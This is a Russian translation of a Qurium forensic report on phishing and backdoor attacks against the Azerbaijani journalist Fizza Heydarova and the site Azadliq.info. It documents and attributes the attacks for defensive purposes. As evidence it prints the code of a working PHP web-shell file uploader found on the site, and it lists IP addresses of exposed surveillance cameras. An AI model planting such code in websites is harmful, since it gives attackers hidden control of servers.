Целевые изощренные фишинговые атаки против диссидентов и активистов в Азербайджане на пике активности

В течение прошлого года Qurium зафиксировал рост целенаправленных фишинговых атак против независимых СМИ и правозащитников в Азербайджане. Атаки осуществляются из инфраструктуры страны безнаказанно.

История Физзы Гейдаровой, редактора Azadliq.info, является примером того, как фишинговые атаки на критиков режима и правозащитников в Азербайджане становятся все более целенаправленными и изощренными. Кроме того, с полной безнаказанностью начинаются фишинговые атаки с IP-пространства, принадлежащего AzerTelecom, одному из крупнейших интернет-провайдеров страны.

Злоумышленник, нацеленный на Fizza, использовал несколько векторов атаки и сумел скомпрометировать ее учетную запись Gmail и получить доступ к своей учетной записи WordPress с помощью Azadliq.info. В попытке обеспечить постоянный доступ к сайту, злоумышленник установил на него несколько бэкдоров. Однако все попытки получить доступ к бэкдорам были заблокированы Qurium, хостинг-провайдером Azadliq.
Злоумышленник также предпринял несколько попыток взломать учетную запись Facebook Физзы , включая отправку поддельного сообщения, подражающего Facebook, перенаправляющего ее на поддельную страницу входа в Facebook.

Количество использованных векторов атак и тот факт, что атаки проводились в течение нескольких месяцев, демонстрируют определенный уровень самоотдачи и решимости. Атаки проводились с IP-адреса 134 {.} 19.217.249, который является тем же IP-адресом, который использовался для запуска атак на другие независимые СМИ в Азербайджане в прошлом, включая основную инфраструктуру Qurium.


22 апреля 2019 года редактор Азадлыг (Azadlıq Qəzeti) Физза Гейдарова сообщил:

Физза сообщает в Facebook, что ее учетная запись была взломана.

В апреле 2019 года Физза получила предупреждение от Facebook о том, что был произведен доступ к учетной записи с IP-адреса 134 {.} 19.217.249 с сети AzerTelecom.

Предупреждение от Facebook, доступ с неизвестного IP-адреса.

Злоумышленник получил доступ к учетной записи Gmail Физзы и сбросил пароль к учетной записи Facebook. После того, как злоумышленник получил доступ к записи, он попытался изменить адрес электронной почты для восстановления на fizze.heyderova.16{@}bk.ru

Злоумышленник заходит на сайт azadliq.info

Получив доступ к учетной записи Gmail, злоумышленник просматривает папку «Входящие» и находит письмо с учетными данными с веб-сайта Azadliq.info. 23 апреля 2019 года злоумышленник получил доступ к административной области веб-сайта, используя выход с анонимной сети Tor с IP-адресом 65 {.} 19.167.132.

“65.19.167.132” “” “-” “23/Apr/2019:10:08:28 +0000” “1556014108.286” “GET” “/rightxxxx” “Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0”

Вскоре после этого злоумышленник устанавливает на сайт бэкдор. Он крадет код из старого бэкдора 2017 года от дейейсера «Aissa Wolf1200».

set_time_limit(0);
error_reporting(0);
if(isset($_GET["rhs334"])){echo"<center></center></enter><font color=black></font>".php_uname()."";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}

if(get_magic_quotes_gpc()){
    foreach($_POST as $key=>$value){
        $_POST[$key] = stripslashes($value);
    }
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>index.php</title>
<style>
body{
    font-family: "orbitron";
    background-color: #e6e6e6;
    text-shadow:0px 0px 1px #757575;
}

Злоумышленник устанавливает в систему еще один бэкдор, скрытый с помощью FOPO (бесплатный онлайн-обфускатор PHP). Он загружает код с exploit.com.

Злоумышленник не замечает, что «оболочка», которую он скачал с exploit.com, уже забекдорена автором «byhero44». Полное описание этого «бэкдор на бэкдор» можно найти здесь.

К 23 апреля 2019 года злоумышленник установил два бэкдора на сайт Азадлыг. Код от них обоих был найден на публичных форумах, и один из них и был зашифрован и забэкдорен самим автором.

8 мая 2019 года злоумышленник редактирует тему WordPress, пытаясь украсть пароли сайта. Он подключается к бэкдору с помощью браузера Tor.

"185.220.102.7" "08/May/2019:12:52:59 +0000" "GET" "/wp-admin/plugins.php?_wpnonce=96f78b228f&action=activate&plugin=wp-file-manager/file_folder_manager.php" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"

Поскольку Qurium блокирует его попытку, он пытается подключиться снова, используя UltraVPN.

161.129.70.190" "08/May/2019:13:08:04 +0000" "1557320884.848" "GET" "/" "https://www.azadliq.info/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"

Qurium заблокировал несколько попыток, исходящих от разных VPN каналов, пока злоумышленник не разорвал свое VPN-соединение с 161 {.} 129.70.190 и повторно подключился с 134 {.} 19.217.249, того же IP-адреса от AzerTelecom, который пытался получить доступ к учетной записи Facebook Физзы.

В ожидании возвращения злоумышленника

В течение нескольких недель злоумышленник не предпринимал дальнейших попыток доступа к бэкдорам, размещенным на веб-сайте Azadliq, до 31 мая 2019 года, когда он опять пытался проникнуть в свои скрытые бэкдоры, используя хост сети Tor, размещенный на M247 Ltd.

"195.206.105.217" "31/May/2019:15:16:01 +0000"  "GET" "/wp-content/uploads/2015/12/a.txt?id=randdaoma" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0" 
"195.206.105.217" "31/May/2019:15:16:15 +0000" "GET" "/wp-content/uploads/2015/12/a.txt?" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0" 

Заметив, что бэкдор не работает, злоумышленник возвращается 6 июня, используя другого провайдера Windscribe VPN 142 {.} 44.173.129.

«Кто-то вошел в вашу учетную запись Facebook. Пожалуйста, обновите ваш пароль по этой ссылке, если это были не вы

Ссылка открывала на поддельную страницу входа в Facebook.

Сервис Bit.ly предоставляет интересную информацию о созданной им короткой ссылке. Мы исследовали путь «2Jjbxnc» и получили данную информацию.

Ссылка была создана 7 мая 2019 года, но до 19 мая никаких действий не было. Попытка атаки на Физзу была 23 мая. Судя по количеству кликов, ссылка была отправлена нескольким жертвам.

На веб-сайте https://www.itdib.az злоумышленник разместил поддельную страницу входа в Facebook внутри доступной для записи папки .well-known, папки, используемой шифрованием Let для предоставления новых SSL-сертификатов.

Что такое itdib.az? Гюльчатай открой личико!

Itdib в Азербайджане является общественной инициативой для информационной поддержки общественных инициатив, которыми руководит Сезарет Гусейнзаде. Эта платформа предоставила бесплатное место для размещения нескольких НПО в Азербайджане по IP-адресу: 77 {.} 245.159.55

Еще одна попытка …

В июне 2019 года злоумышленник пытается получить доступ к учетной записи Физзы в мессенджере Телеграм , используя выход IPv6 сети Tor.

Что мы знаем о 134 {.} 19.217.249?

Фишинговые атаки – не единственные атаки с этого IP-адреса. В последние годы мы зафиксировали следующие попытки с того же IP-адреса:

2018/10: Acunetix scan against azadliq.info
2018/11: Web Flood against cumhuriyyet.net
2019/12: Vulnerability scan against meydan.tv
2020/02: Bruteforce attempts against Qurium services: FTP/IMAP/POP

В 2020 году IP-адрес остался активным и произвел брутфорс атаки на домен azadliq.info и meydan.tv, чтобы найти скрытые сервисы этих организаций.

На IP-адресе «.249» размещается маршрутизатор Mikrotik в сети внутри AzerTelecom с очень небольшим количеством общедоступных услуг.

По данным Censys.ip, в сети размещены 9 камер наблюдения от производителя Hikvision по адресам:

134.19.217{.}136
134.19.217{.}140
134.19.217{.}142
134.19.217{.}155
134.19.217{.}164 x
134.19.217{.}174
134.19.217{.}45
134.19.217{.}63 x
134.19.217{.}92

В августе 2019 года тот же IP-адрес, что и фишинговая атака против Физзы (134 {.} 19.217.249), редактирует страницу Википедии Вилайта Эйвазова, работника Министерство внутренних дел Азербайджана.

Отчет публикуется с разрешения https://www.qurium.org/
Оригинал отчета на английском языке
Перевод Константин Адамов.